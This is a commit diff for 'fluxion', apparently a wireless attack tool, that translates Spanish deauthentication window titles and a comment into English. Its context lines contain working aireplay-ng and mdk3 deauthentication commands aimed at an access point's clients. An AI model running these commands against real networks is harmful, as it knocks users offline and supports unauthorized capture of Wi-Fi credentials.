translate deauth titles
This commit is contained in:
parent
6ef2e1a267
commit
ef73ad35e2
8
fluxion
8
fluxion
|
@ -15,7 +15,7 @@ clear
|
||||||
##################################### < CONFIGURATION > #####################################
|
##################################### < CONFIGURATION > #####################################
|
||||||
|
|
||||||
DUMP_PATH="/tmp/TMPflux"
|
DUMP_PATH="/tmp/TMPflux"
|
||||||
# Number de desautentificaciones
|
# Deauth duration during handshake capture
|
||||||
DEAUTHTIME="30"
|
DEAUTHTIME="30"
|
||||||
revision=1
|
revision=1
|
||||||
version=0.19
|
version=0.19
|
||||||
|
@ -2908,13 +2908,13 @@ function handshakecheck {
|
||||||
# Deauth all
|
# Deauth all
|
||||||
function deauthall {
|
function deauthall {
|
||||||
|
|
||||||
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautenticando a todos de $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &
|
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &
|
||||||
}
|
}
|
||||||
|
|
||||||
function deauthmdk3 {
|
function deauthmdk3 {
|
||||||
|
|
||||||
echo "$Host_MAC" >$DUMP_PATH/mdk3.txt
|
echo "$Host_MAC" >$DUMP_PATH/mdk3.txt
|
||||||
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautenticando mdk3 a todos de $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN &
|
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating via mdk3 all clients on $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN &
|
||||||
mdk3PID=$!
|
mdk3PID=$!
|
||||||
sleep 15
|
sleep 15
|
||||||
kill $mdk3PID &>$flux_output_device
|
kill $mdk3PID &>$flux_output_device
|
||||||
|
@ -2924,7 +2924,7 @@ function deauthmdk3 {
|
||||||
function deauthesp {
|
function deauthesp {
|
||||||
|
|
||||||
sleep 2
|
sleep 2
|
||||||
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautenticando a $Client_MAC" -e aireplay-ng -0 $DEAUTHTIME -a $Host_MAC -c $Client_MAC --ignore-negative-one $WIFI_MONITOR &
|
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating client $Client_MAC" -e aireplay-ng -0 $DEAUTHTIME -a $Host_MAC -c $Client_MAC --ignore-negative-one $WIFI_MONITOR &
|
||||||
}
|
}
|
||||||
|
|
||||||
# Close all processes
|
# Close all processes
|
||||||
|
|
Loading…
Reference in New Issue